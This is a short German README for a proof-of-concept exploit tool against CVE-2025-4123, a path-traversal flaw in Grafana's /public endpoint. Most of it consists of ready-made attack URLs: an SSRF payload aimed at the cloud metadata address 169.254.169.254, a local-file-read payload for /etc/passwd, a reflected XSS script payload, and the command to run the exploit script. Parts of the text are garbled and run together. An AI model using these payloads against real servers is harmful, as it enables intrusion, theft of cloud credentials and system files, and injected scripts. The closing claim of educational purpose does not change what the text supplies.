
CVE-2025-4123 - Grafana-Werkzeug
Entwickelt von mitsec
Dies ist ein Proof-of-Concept-Exploit-Tool (PoC) für CVE-2025-4123, eine kritische Path-Traversal-Schwachstelle im /public-Endpunkt von Grafana. Der Exploit ermöglicht:
Grafana-Instanzen, bei denen der /public/-Endpunkt codierte Pfade wie folgt fehlerhaft verarbeitet:
/public/..%2F%5coast.pro%2F%3f%2F..%2F..
python3 cve_2025_4123_exploit_mitsec_final.py
Wähle anschließend den gewünschten Modus:
169.254.169.254/etc/passwd lesen[*] SSRF URL: http://127.0.0.1:3000/public/..%2F%5C169.254.169.254/latest/meta-data/%2F%3f%2F..%2F..
[*] LFI URL: http://127.0.0.1:3000/public/..%2F%5coast.pro%2F%3f%2F..%2F..%2F..%2Fetc%2Fpasswd
[*] XSS URL: http://127.0.0.1:3000/public/%3Cscript%3Ealert('mitsec')%3C%2Fscript%3E
Dieser Code wird ausschließlich für Bildungs- und autorisierte Testzwecke bereitgestellt. Die unbefugte Verwendung gegen Systeme ohne Einwilligung ist illegal.